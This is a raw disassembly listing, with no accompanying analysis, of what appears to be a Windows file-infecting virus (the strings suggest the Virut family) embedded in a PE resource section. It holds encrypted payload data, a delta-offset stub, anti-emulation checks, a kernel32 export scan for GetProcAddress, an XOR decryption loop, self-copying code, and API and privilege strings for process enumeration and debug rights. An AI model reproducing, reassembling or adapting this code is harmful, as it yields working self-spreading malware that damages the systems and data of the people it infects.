dd 7160B8D0h, 0AD7FCD00h, 68EF6E50h, 0A34D3CAEh, 1442B5CFh
dd 0FEA2D386h, 414D8F51h, 0D26DC656h, 7FA3D486h, 414E8FDCh
dd 0FE50BF8Dh, 0FCF4E59Ah
dd 0BE41FA55h, 0DBD67295h, 0B2D965AAh, 3025955Dh, 0EBFB34E8h
dd 0D5E0B4AAh, 0D1DD67Bh, 0F669C200h, 9DA7D886h, 2B46E795h
dd 83156E02h, 69571653h, 71784DC0h, 9F3EBA00h, 7E7915A8h
dd 4154955Eh, 0B4BC0653h, 0D284B8E5h, 0BE55DA19h, 0DC2C5C95h
dd 6EEA04ABh, 0F7DB68A9h, 0ED316EFEh, 98ADE9C4h, 0D6A8CE57h
dd 0EE326F23h, 99ADE345h, 161CC558h, 0BD46124Ah, 0CEEBB3FDh
dd 0BA0F9A1Ah, 0C02FAC91h, 9BA818AFh, 0E069B5Ah, 0A251154Ah
dd 94FA7B0h, 476BB7B2h, 0A3578E35h, 0F7E0F1DBh, 485CF55Dh
dd 0C510807h, 0AE990227h, 0B6A51D5Dh, 79586A7Ch, 0AF9F0B26h
dd 0D1D3125Eh, 9F097A2Eh, 0BADCA7B4h, 1A5FA05Fh, 839FB45Ah
dd 5EB5C699h, 7C4B6CF5h, 0F700A40Bh, 0F1E3F7B6h, 7F52F024h
dd 0B4400922h, 0E22207B7h, 0A662934Eh, 0F90D4E07h, 0D6C88ACFh
dd 2917CA0Ah, 55E4F4Fh, 9592232Ch, 0B5E12C64h, 0F40F6024h
dd 0F437768Bh, 0D865967Ch, 0CC3CA695h, 3244ADBBh, 52568B27h
dd 0FD153A82h, 1D31FDBCh, 5357B138h, 23AFDE4Bh, 41BDCE91h
dd 0AB975B94h, 5B969375h, 0AABECF9Eh, 0F3CC2939h, 146534h
dd 8BDA6A32h, 239AA5Ah, 17E547Fh, 0ACBC9792h, 0C2962A6Bh
dd 22479F7h, 0D8E43F44h, 0CFE4274Eh, 51146537h, 1B33F9A8h
dd 59598AC9h, 5444034Ch, 3A41AD92h, 5A59868Bh, 0D881AA41h
dd 76BECFE8h, 6B4754EAh, 68FC551Ah, 4E410037h, 6C7BD7FDh
dd 4B91921Bh, 0E4BECFD3h, 0B55AF525h, 0F7EBA745h, 0A6F27A00h
dd 0A3FAA42h, 43FC6142h, 7341003Ah, 6F7CE6F6h, 556C031Eh
dd 478517FDh, 0E5AE558Bh, 0B244053h, 0E2C89A9Ch, 0E4E46346h
dd 0C24656Fh, 0E6EFAE9Ah, 3338FB26h, 2121C0DEh, 2D41FFFCh
dd 6359865Ah, 7B0BBDE3h, 0B9B217B9h, 2C3AAA78h, 5F55026Fh
dd 0F6FAD187h, 0F096AA35h, 10247965h, 0BBBEF327h, 3521F97Ah
dd 70422140h, 0FDDB8ABCh, 0F296FA7Bh, 12247EFFh, 420B7242h
dd 699A50h, 131455EFh, 41BE9584h, 5945B3E8h, 0C681D828h
dd 32BECFCCh, 5A446DC3h, 42460329h, 0EB5B6A2Bh, 0AFEAAA4Fh
dd 0F981D826h, 91BECFCAh, 3A68C0D7h, 17163D79h, 11417FD6h
dd 9293B769h, 2AA9D6D3h, 0C3BECFC2h, 0E601A1F6h, 0E614553Eh
dd 0F492964Dh, 6F654283h, 4943552Eh, 0F6F5BC96h, 3C2D84B6h
dd 8EEB5563h, 0C68ED39Bh, 716EC216h, 0A9995530h, 0C78EE76Dh
dd 0DFD427DFh, 0F514651Dh, 37410E50h, 7369A66Fh, 505D0232h
dd 9DFBB194h, 3825EEA6h, 5E81AA33h, 4FBECFF2h, 40EDA549h
dd 0B3145536h, 0CBBEFAB7h, 82DC278Ah, 7814652Dh, 0E077426Dh
dd 2281AABBh, 0A1EBAAC7h, 0FD92325Ch, 0FC66AA8Ch, 23145727h
dd 0CF2E1363h, 113DAA8Dh, 24145439h, 0E3136A1Ch, 0BEE8AABEh
dd 251454A9h, 0BA6A74B4h, 0EE96F88Fh, 262479F7h, 0A4E73F60h
dd 6FE1C29Dh, 0B2EB553Bh, 0D28ED38Fh, 0C0EA487Ah, 2824759Ah
dd 5E978AE7h, 4E490017h, 0BCEB053Dh, 0D48ED351h, 0FB666A16h
dd 2A1454B7h, 5EB2BF62h, 0F595594h, 1B34F3BAh, 283B39EAh
dd 80699ABBh, 2D7E552Ah, 4241FD81h, 82598653h, 22EBADC2h
dd 0D8BF9F68h, 16E43997h, 2E2475E0h, 8AECEF87h, 0A8DC3F67h
dd 0EF915573h, 0DBFE7AE1h, 38E4AA99h, 30247580h, 0AA56F75Eh
dd 0EE96556Ch, 311455D1h, 5558D4AEh, 783D8EAFh, 23864D3h
dd 0F0372F1h, 39699ABCh, 0C546BD46h, 4B33000Dh, 89598A22h
dd 207C5522h, 8DBEFFF3h, 4BFC55CDh, 0B8146565h, 6DAADBB0h
dd 0BB59E50Ah, 801B054Ah, 0C5FA74FFh, 84896BB4h, 25151F49h
dd 0A8ACFDBCh, 0A92DA1A2h, 37F5D544h, 0B2B61F36h, 9E4DEEA9h
dd 0B44467B2h, 0D4920045h, 8F7542A3h, 1431554Eh, 0CB9E87CFh
dd 0AA498484h, 1531706Ah, 9E9B87C2h, 9B1A8F85h, 725D1A1Ah
dd 18E9FFDBh, 0A2424F33h, 91D0D451h, 82BEFFFCh, 0C03EFAA7h
dd 12D5C0ADh, 6435FFCDh, 9459BF9Ah, 24F75539h, 0BBB33695h
dd 9569AF41h, 24317354h, 14E9FFF5h, 0A6424F3Fh, 4DD0D655h
dd 83B4EB50h, 966AABA2h, 61CDEBD8h, 0B8970130h, 0BAAA3955h
dd 81935765h, 5E4C567Eh, 965C8155h, 5425FDD6h, 66C20330h
dd 0A6435027h, 2BD67255h, 0B8955500h, 0BAD33A55h, 0B99A5A65h
dd 7AEB7B00h, 23E24E21h, 412A77AAh, 45370BB0h, 7E10A1DFh
dd 0BEE4AA0Fh, 8D17561h, 97063FA3h, 8E97B7BEh, 564AC62Bh
dd 96429F55h, 0B69AFAA6h, 149BB0EBh, 0A65F053Fh, 2EA3DF55h
dd 0EAC93A15h, 0A61C9FDEh, 0BE1F6020h, 0DBE66295h, 68C836AAh
dd 4120517Bh, 6E0C1D74h, 9646970Ch, 41216255h, 0C53288C6h
dd 7F77B89Ah, 0BEDD9D5Dh, 0EBC9CC5Dh, 0B8870C27h, 0BE756465h
dd 0DBE20295h, 698139AAh, 419FE15Ah, 6E461000h, 964A8BA9h
dd 0BE73663Fh, 0DBFC4C95h, 99BB39AAh, 4126C3D1h, 0BB113900h
dd 0C67FD7FAh, 414F693Fh, 0BD121300h, 0BD8C2B55h, 0B9AB6965h
dd 0D9571BFFh, 1F7EBFAEh, 71196DD0h, 0E0599800h, 1B7FF09Ah
dd 711A78C0h, 81874700h, 37F91AAh, 411B4040h, 0E429EF83h
dd 9685C22Eh, 0BE2C0755h, 0DBE71FB5h, 87173CAAh, 0C22D5E79h
dd 6FD7E6F8h, 9683C743h, 7135EADCh, 22EA1A30h, 0C6D506A9h
dd 102B1A04h, 0DBDDAEFFh, 37AC69Ah, 41005AA0h, 6FD4DC85h
dd 9686C46Fh, 0C4B8BB66h, 0EBEC2D1Fh, 0FED699FBh, 413D734Ah
dd 0AE48E150h, 1388F986h, 3FB77B95h, 62DE1F03h, 0A6B9E92Fh
dd 0ABFB655h, 8B8C9838h, 44B9CBAAh, 0B0C2B756h, 6E69C0F7h
dd 96BBFC85h, 0F90A3CDEh, 0EBE139CCh, 578F1F99h, 0A0C089A2h
dd 0DBC5A689h, 994ECE9Ah, 0B83E32E2h, 0B86E12E3h, 0D539C0B2h
dd 8E97941h, 0E8CCE46Bh, 0C9B5517Ah, 0B8541222h, 68AC3874h
dd 0E491DDD0h, 7D70F78Ah, 0E8F2658Bh, 0D21CC2E8h, 98CB821Dh
dd 6EDCE923h, 96A2E3B1h, 5B62796h, 63612524h, 9693D412h
dd 70FDBF66h, 0DBC71D32h, 0A7BAE584h, 0A4BCE75h, 9B864572h
dd 0F8FCF8CBh, 4B4DEE33h, 8D821023h, 0F3FBB6D8h, 2233F175h
dd 9F840F3Dh, 0B9ADA8DEh, 0A36CD7Ah, 9B814072h, 0F8F1F7CBh
dd 336CEB33h, 82D10063h, 0B6BBEB97h, 3520EC22h, 0CBDE0D68h
dd 0F1F3BEC2h, 7078F23Dh, 92844220h, 0B4A6B9C6h, 2534E837h
dd 0DBCB4065h, 0B9A0E388h, 2035EE3Ch, 0E6CC566Dh, 1D6355A0h
dd 717892D8h, 68BD8400h, 386CDB43h, 7EC88320h, 85867E74h
dd 1D5C14DFh, 5AC700ABh, 5BF50630h, 93496296h, 0AF3E22A7h
dd 9ED90880h, 97E6695Dh, 9E935270h, 0A4B505DFh, 7ED7BAEEh
dd 0A9B3A51Ah, 0EBF83B2Ch, 96A3BCC2h, 0B0A6D455h, 9F06C5FDh
dd 8D296E8Ah, 0CC4FA065h, 24D13A34h, 0A5996BE4h, 0C6F462A8h
dd 0EA85B1D9h, 0B1135227h, 0B2AD9265h, 2477FEA4h, 2B2AE341h
dd 4162BDAAh, 0D822B5FCh, 0F7944563h, 3B6F9227h, 0CBD23D77h
dd 0E2F5D600h, 357AA9B9h, 9EFF7CDDh, 1D970842h, 12D05054h
dd 0EC007130h, 0D2F3A996h, 7F64E356h, 0ED530152h, 6789C6D8h
dd 7E5767A8h, 0EE4F174Ah, 0C990FCD9h, 3058C910h, 0BC427908h
dd 1FA1EFFEh, 0BAA66418h, 0C057C0FAh, 0A844F09Fh, 0B9A404B3h
dd 0CC06CDFAh, 0DFFEB8E7h, 0B97C1854h, 0A53BB8F9h, 92FFA7F2h
dd 0B7A281D8h, 0B05075F8h, 1ABDC181h, 0B6A2604Ch, 0A05B1935h
dd 9937FBFCh, 79A160A0h, 827A2D2h, 24BB0A4Bh, 0B4A05DA6h
dd 0E0E29939h, 49B5F6B5h, 0B39F5F39h, 0F70B4CE3h, 4F37AAB6h
dd 4D518B58h, 0F80D7FE5h, 91489CB7h, 7E4116E9h, 70694E3Dh
dd 0F705799Ah, 4E639453h
dd 54E6457Bh, 4C460547h, 5064A477h, 0B631D169h, 0AE3FF4E0h
dd 0DA65A664h, 22136D4Eh, 0F7807DDDh, 0AAE3A823h, 0A115211h
dd 88BCEBFFh, 0D668A867h, 0FE1253F9h, 0ABE1BD4Bh, 54892D67h
dd 81925413h, 8A9EDF9Eh, 81EDA549h, 0E8145514h, 54410218h
dd 56A02865h, 439F5515h, 0BCF474C8h, 531A6B40h, 7FF9525h
dd 0E73737C2h, 73EC237Ch, 0EB146527h, 51410294h, 59690585h
dd 2389DE18h, 0ACBECFF3h, 6A5981F3h, 0F97ABD19h, 34B1003Bh
dd 5B69AAE0h, 3637E091h, 0EF35FFF5h, 0B4B7A94Ch, 0F8EBA84Ch
dd 0F83F82B4h, 5D69CA55h, 5EEADEFCh, 3EAA85C4h, 6E79AAC7h
dd 196E561Dh, 0B4B80C71h, 0FA9AFD73h, 8F754AFh, 0EBE15B3Ah
dd 0F258A526h, 0B96D292h, 3FD8FFCAh, 9E9631E5h, 0E9C4BDDFh
dd 3CE40034h, 286AA63Ch, 0B55D831h, 3196BCE7h, 6369F5F0h
dd 2E529222h, 999EDFEDh, 0EF41E1F1h, 8A9F4569h, 0BA8ECFE9h
dd 1661E040h, 185EDC27h, 38AEBDCEh, 0ED69F219h, 21247AA0h
dd 0B4FCFED0h, 5439E97Ah, 309F31F4h, 0E5BC70B5h, 586E17FFh
dd 1C145517h, 41426B56h, 4ADC5582h, 0EB146518h, 8F929246h
dd 75DC557Eh, 0EA146519h, 0F0953241h, 60E4277Fh, 9B14651Ah
dd 0F18EEC40h, 63BFB80h, 10A1AA2Bh, 3DBECFE6h, 5D45CF14h
dd 1FA1AA2Ch, 3CBECFE7h, 5E426717h, 0E6A1D82Dh, 3BBECFF6h
dd 5F59A936h, 8FEB032Eh, 0C58ED384h, 406E0F07h, 0D814551Fh
dd 0C6BEFF32h, 7003F785h, 36F9B8B1h, 37E6FFEBh, 0AEC6B89h
dd 98146524h, 3D3C1Ch, 0B2665A78h, 2E012DB7h, 0D9833CDDh
dd 1698088h, 6395332Fh, 0BBD2F3FAh, 9D09B9FCh, 0DFEBAAF0h
dd 9056FAAAh, 9E965577h, 0DEEBAAE7h, 0E141D181h, 655DFCF3h
dd 2214708Eh, 68569FE1h, 0D965573h, 750DE0Eh, 310B72D2h
dd 0F2699AA3h, 0A5725D68h, 0BCBCF9D9h, 7A01FCABh, 0AE14AA39h
dd 82BE9520h, 0D2FC55DFh, 0A5146516h, 0EF3FF721h, 205695CCh
dd 0E197564Eh, 2FB617E2h, 281556Eh, 49EBAAC3h, 0D3CA4724h
dd 0CF82AA92h, 29147A85h, 0D4AE17E8h, 5FABAA93h, 2A24ED3Eh
dd 0D656FFE9h, 4269AA94h, 7F99551Bh, 0F873F3CEh, 0FD695216h
dd 2CFC3559h, 5CBEFFEBh, 0DF598EC2h, 0C0954FCAh, 0D88ED45Bh
dd 7C87AD7Fh, 2AD634BDh, 150Dh dup(0)
; ---------------------------------------------------------------------------
call $+5
cld
mov eax, [esp]
mov ecx, [eax+29BBh]
mov [eax+3303h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_41F04D
pop ecx
mov [eax+3307h], esi
mov cl, [eax+29BFh]
mov [eax+330Bh], edi
cmp cl, 0E8h
jz short loc_41F041
mov ebx, [eax+29C1h]
jmp short loc_41F04B
; ---------------------------------------------------------------------------
loc_41F041: ; CODE XREF: .rsrc:0041F037�j
mov ecx, [eax+29C0h]
mov ebx, [ecx+ebx+2]
loc_41F04B: ; CODE XREF: .rsrc:0041F03F�j
mov ebx, [ebx]
loc_41F04D: ; CODE XREF: .rsrc:0041F01F�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 7005h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+1039CCh]
mov ecx, 0C2h
rep movsb
sldt cx
test ecx, ecx
jnz short loc_41F07B
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_41F07B: ; CODE XREF: .rsrc:0041F074�j
and ebx, 0FFFFF000h
loc_41F081: ; CODE XREF: .rsrc:0041F090�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_41F092
loc_41F08A: ; CODE XREF: .rsrc:0041F09F�j
sub ebx, 100h
jnz short loc_41F081
loc_41F092: ; CODE XREF: .rsrc:0041F088�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_41F08A
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_41F0AC: ; CODE XREF: .rsrc:loc_41F0C0�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_41F0C0
cmp dword ptr [eax+5], 6441636Fh
jz short loc_41F0C5
loc_41F0C0: ; CODE XREF: .rsrc:0041F0B5�j
loop loc_41F0AC
pop ecx
jmp short loc_41F0F0
; ---------------------------------------------------------------------------
loc_41F0C5: ; CODE XREF: .rsrc:0041F0BE�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+101137h]
lea ecx, [ebp+101120h]
mov dx, [eax-19h]
call ecx
jmp short loc_41F137
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F17E
loc_41F0F0: ; CODE XREF: .rsrc:0041F0C3�j
; sub_41F17E+10�j ...
mov eax, [ebp+1039C0h]
and eax, 400000h
jz short loc_41F11C
lea esi, [ebp+1039C4h]
lodsd
mov edi, [esp+arg_0]
stosd
mov ebx, [ebp+104308h]
movsb
mov edi, [ebp+104310h]
mov esi, [ebp+10430Ch]
loc_41F11C: ; CODE XREF: sub_41F17E-83�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_41F17E
; ---------------------------------------------------------------------------
push ds
xchg eax, esp
; =============== S U B R O U T I N E =======================================
sub_41F120 proc near ; CODE XREF: sub_42145B+2DF�p
push ebx
mov ecx, 2889h
mov ebx, edx
loc_41F128: ; CODE XREF: sub_41F120+13�j
xor [eax], dl
sub dl, bl
add eax, 1
xchg bl, bh
xchg dl, dh
loop loc_41F128
pop ebx
retn
sub_41F120 endp
; ---------------------------------------------------------------------------
loc_41F137: ; CODE XREF: .rsrc:0041F0EE�j
call near ptr loc_41F146+2
inc ebx
insb
outsd
jnb short near ptr loc_41F1A3+3
dec eax
popa
outsb
db 64h
insb
loc_41F146: ; CODE XREF: .rsrc:loc_41F137�p
add gs:[ebx-1], dl
setalc
mov [ebp+103E62h], eax
call near ptr loc_41F162+1
inc ebx
jb short loc_41F1BE
popa
jz short near ptr loc_41F1C0+1
inc ebp
jbe short near ptr loc_41F1C0+4
outsb
jz short loc_41F1A3
loc_41F162: ; CODE XREF: .rsrc:0041F151�p
add [ebx-1], dl
setalc
mov [ebp+103E66h], eax
call sub_41F17E
inc edi
db 65h
jz short near ptr loc_41F1C0+1
popa
jnb short near ptr loc_41F1EA+2
inc ebp
jb short near ptr loc_41F1EA+3
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_41F17E proc near ; CODE XREF: .rsrc:0041F16C�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0041F0F0 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 0041F534 SIZE 0000000B BYTES
push ebx
call esi ; GetProcAddress
mov [ebp+103E6Ah], eax
call sub_41F55F
test eax, eax
jz loc_41F0F0
push eax
call dword ptr [ebp+103E6Ah]
test eax, eax
jnz loc_41F534
loc_41F1A3: ; CODE XREF: .rsrc:0041F160�j
; .rsrc:0041F13F�j
cmp byte ptr [ebp+10153Fh], 1
jnz short loc_41F1C0
push dword ptr [ebp+104308h]
dec byte ptr [ebp+10153Fh]
pop dword ptr [ebp+101598h]
loc_41F1BE: ; CODE XREF: .rsrc:0041F157�j
jmp short loc_41F1C7
; ---------------------------------------------------------------------------
loc_41F1C0: ; CODE XREF: sub_41F17E+2C�j
; .rsrc:0041F15A�j ...
and dword ptr [ebp+101598h], 0
loc_41F1C7: ; CODE XREF: sub_41F17E:loc_41F1BE�j
and dword ptr [ebp+101588h], 0
and dword ptr [ebp+10158Ch], 0
and dword ptr [ebp+101590h], 0
push edi
mov byte ptr [ebp+1012D4h], 1
mov [ebp+103E6Eh], esi
loc_41F1EA: ; CODE XREF: .rsrc:0041F176�j
; .rsrc:0041F179�j
lea esi, [ebp+101604h]
xor ecx, ecx
lea edi, [ebp+103E7Ah]
mov cl, 20h
call sub_41F59C
pop edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jz loc_41F2E3
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+103E72h], eax
push 7328h
push 0
call dword ptr [ebp+103EF2h]
test eax, eax
jz loc_41F534
xchg eax, edi
lea esi, [ebp+101000h]
mov ebp, edi
mov ecx, 0CCAh
sub ebp, 101000h
lea edx, [ebp+101254h]
rep movsd
jmp edx
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+101B4Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+103E72h]
add esp, 20h
test eax, eax
jz loc_41F534
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_41F534
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+103E72h]
push 1000Ah
call dword ptr [ebp+103E72h]
call loc_41F2D3
jmp loc_41F534
; ---------------------------------------------------------------------------
loc_41F2D3: ; CODE XREF: sub_41F17E+14B�p
; sub_41F17E+162�j
push 1
pop ecx
jecxz short locret_41F2E2
push 0Ah
call dword ptr [ebp+103EE6h]
jmp short loc_41F2D3
; ---------------------------------------------------------------------------
locret_41F2E2: ; CODE XREF: sub_41F17E+158�j
retn
; ---------------------------------------------------------------------------
loc_41F2E3: ; CODE XREF: sub_41F17E+8B�j
cmp dword ptr [ebp+103E92h], 0
jz loc_41F534
call near ptr loc_41F2FA+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_41F2FA: ; CODE XREF: sub_41F17E+172�p
add bh, bh
sub_41F17E endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
lea esi, [ebp+1017DEh]
xor ecx, ecx
lea edi, [ebp+103EFAh]
mov cl, 0Eh
xchg eax, ebx
call sub_41F59C
cmp dword ptr [ebp+103F2Eh], 0
jz loc_41F534
mov eax, [ebp+103EFEh]
push dword ptr [eax+1]
pop dword ptr [ebp+103917h]
mov eax, [ebp+103F16h]
push dword ptr [eax+1]
pop dword ptr [ebp+103964h]
mov eax, [ebp+103F02h]
push dword ptr [eax+1]
pop dword ptr [ebp+10396Bh]
cmp dword ptr [ebp+10396Bh], 10000h
jnb loc_41F534
mov ecx, [ebp+103F06h]
jecxz short loc_41F383
push dword ptr [ecx+1]
pop dword ptr [ebp+103978h]
mov ecx, [ebp+103F0Eh]
jecxz short loc_41F383
push dword ptr [ecx+1]
pop dword ptr [ebp+103985h]
loc_41F383: ; CODE XREF: .rsrc:0041F367�j
; .rsrc:0041F378�j
call sub_41F540
lea edi, [ebp+103F84h]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+1015EBh]
mov ecx, 19h
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
lea edx, [ebp+103E30h]
loc_41F3CC: ; CODE XREF: .rsrc:0041F3D5�j
lodsb
mov [edx], ax
stosw
add edx, 2
loop loc_41F3CC
mov edx, esp
push 0
push 7328h
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+103F0Ah]
pop eax
add esp, 40h
push 7328h
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 7328h
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+103F12h]
pop edi
pop ecx
test edi, edi
jz loc_41F534
lea esi, [ebp+101000h]
mov ecx, 0CCAh
mov ebp, edi
rep movsd
sub ebp, 101000h
lea eax, [ebp+10144Ah]
jmp eax
; ---------------------------------------------------------------------------
dw 5450h
dd 0FF6A206Ah, 3F1A95FFh, 0C0850010h, 0E834755Fh, 14Fh
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0E8570065h
dd 550h, 4288B5FFh, 95FF0010h, 103E9Eh, 6295FF57h, 6A00103Eh
dd 0FF026A00h, 103E9295h, 128B900h, 2B970000h, 240C89E1h
dd 95FF5754h, 103ED6h, 0A583F633h, 103F72h, 0FF575400h
dd 103EDA95h, 74C08500h, 0FE834666h, 0FFEE7204h, 6A082474h
dd 0FF2A6A00h, 103ED295h, 74C08500h, 88E893DCh, 33000005h
dd 3AE391C9h, 3F728539h, 32750010h, 24247C81h, 73727363h
dd 0C1812874h, 0EAFh, 56505450h, 53505051h, 3E8A95FFh
dd 0C0850010h, 0FF0F7459h, 8F082474h, 103F7285h, 0FDB5E800h
dd 0FF53FFFFh, 103E6295h, 818EEB00h, 128C4h, 95FF5700h
dd 103E62h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F17E
loc_41F534: ; CODE XREF: sub_41F17E+1F�j
; sub_41F17E+B2�j ...
call dword ptr [ebp+103E62h]
jmp loc_41F0F0
; END OF FUNCTION CHUNK FOR sub_41F17E
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41F540 proc near ; CODE XREF: .rsrc:loc_41F383�p
; sub_41F55F+2�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
mov eax, esp
push 0
push eax
push 0Ch
mov eax, esp
jmp edx
sub_41F540 endp
; ---------------------------------------------------------------------------
aVx_4 db 'Vx_4',0
db 0
; =============== S U B R O U T I N E =======================================
sub_41F55F proc near ; CODE XREF: sub_41F17E+9�p
xor ecx, ecx
call sub_41F540
lea edx, [ebp+101559h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+103E66h]
add esp, 20h
retn
sub_41F55F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 585858h, 3328h, 0E73h, 3 dup(0)
dd 29C0h, 0
; =============== S U B R O U T I N E =======================================
sub_41F59C proc near ; CODE XREF: sub_41F17E+7C�p
; .rsrc:0041F312�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+103E6Eh]
stosd
pop ecx
loc_41F5A7: ; CODE XREF: sub_41F59C+E�j
lodsb
test al, al
jnz short loc_41F5A7
loop sub_41F59C
retn
sub_41F59C endp
; =============== S U B R O U T I N E =======================================
sub_41F5AF proc near ; CODE XREF: sub_42112D+25�p
; FUNCTION CHUNK AT 0041F639 SIZE 000003C0 BYTES
; FUNCTION CHUNK AT 0041FA09 SIZE 00000027 BYTES
lea edx, [ebp+101985h]
push edx
call dword ptr [ebp+103EC6h]
mov [ebp+104288h], eax
call near ptr loc_41F5DC+1
dec esp
outsd
outsd
imul esi, [ebp+70h], 50h
jb short loc_41F639
jbe short near ptr loc_41F639+2
insb
db 65h, 67h, 65h
push esi
popa
insb
jnz short loc_41F640
inc ecx
loc_41F5DC: ; CODE XREF: sub_41F5AF+13�p
add [eax-1], dl
sub_41F5AF endp ; sp-analysis failed
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
mov [ebp+10428Ch], eax
retn
; ---------------------------------------------------------------------------
db 5Ch ; \
db 42h ; B
db 61h ; a
db 73h ; s
db 65h ; e
db 4Eh ; N
db 61h ; a
db 6Dh ; m
db 65h ; e
db 64h ; d
db 4Fh ; O
db 62h ; b
db 6Ah ; j
db 65h ; e
db 63h ; c
db 74h ; t
db 73h ; s
db 5Ch ; \
db 56h ; V
db 74h ; t
db 53h ; S
db 65h ; e
db 63h ; c
db 74h ; t
db 0
db 6Ch ; l
db 73h ; s
db 74h ; t
db 72h ; r
db 6Ch ; l
db 65h ; e
db 6Eh ; n
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
db 4Dh ; M
db 61h ; a
db 70h ; p
db 70h ; p
db 69h ; i
db 6Eh ; n
db 67h ; g
db 41h ; A
db 0
db 43h ; C
db 72h ; r
db 65h ; e
db 61h ; a
db 74h ; t
db 65h ; e
db 50h ; P
db 72h ; r
db 6Fh ; o
db 63h ; c
db 65h ; e
db 73h ; s
db 73h ; s
db 41h ; A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41F5AF
loc_41F639: ; CODE XREF: sub_41F5AF+1F�j
; sub_41F5AF+21�j
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_41F6A3+2
loc_41F640: ; CODE XREF: sub_41F5AF+2A�j
push edx
db 65h
insd
outsd
jz short loc_41F6AB
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_41F6B6+2
push esp
push 64616572h
add [ebx+72h], al
db 65h
popa
jz short near ptr loc_41F6C2+3
push esp
outsd
outsd
insb
push 33706C65h
xor dl, [ebx+6Eh]
popa
jo short near ptr loc_41F6E1+1
push 4500746Fh
js short loc_41F6DF
jz short near ptr loc_41F6CB+1
push 64616572h
add [esi+69h], al
insb
db 65h
push esp
imul ebp, [ebp+65h], 79536F54h
jnb short loc_41F700
db 65h
insd
push esp
imul ebp, [ebp+65h], 65724600h
db 65h
dec esp
imul esp, [edx+72h], 797261h
inc edi
db 65h
jz short near ptr loc_41F6E3+6
loc_41F6A3: ; CODE XREF: sub_41F5AF+8F�j
imul ebp, [ebp+41h], 69727474h
loc_41F6AB: ; CODE XREF: sub_41F5AF+95�j
bound esi, [ebp+74h]
db 65h
jnb short loc_41F6F2
add [edi+65h], al
jz short near ptr loc_41F6FB+1
loc_41F6B6: ; CODE XREF: sub_41F5AF+A2�j
imul ebp, [ebp+53h], 657A69h
inc edi
db 65h
jz short loc_41F708
loc_41F6C2: ; CODE XREF: sub_41F5AF+AF�j
imul ebp, [ebp+54h], 656D69h
inc edi
loc_41F6CB: ; CODE XREF: sub_41F5AF+C7�j
db 65h
jz short near ptr loc_41F71A+1
outsd
db 64h
jnz short near ptr loc_41F739+5
db 65h
dec eax
popa
outsb
db 64h
insb
db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_41F72D+6
loc_41F6DF: ; CODE XREF: sub_41F5AF+C5�j
db 65h
insd
loc_41F6E1: ; CODE XREF: sub_41F5AF+BE�j
jo short near ptr loc_41F727+2
loc_41F6E3: ; CODE XREF: sub_41F5AF+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_41F741+3
db 65h
insd
loc_41F6F2: ; CODE XREF: sub_41F5AF+FF�j
jo short near ptr loc_41F741+3
popa
jz short near ptr loc_41F75E+1
inc ecx
add [edi+65h], al
loc_41F6FB: ; CODE XREF: sub_41F5AF+105�j
jz short loc_41F753
db 65h
jb short near ptr loc_41F772+1
loc_41F700: ; CODE XREF: sub_41F5AF+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
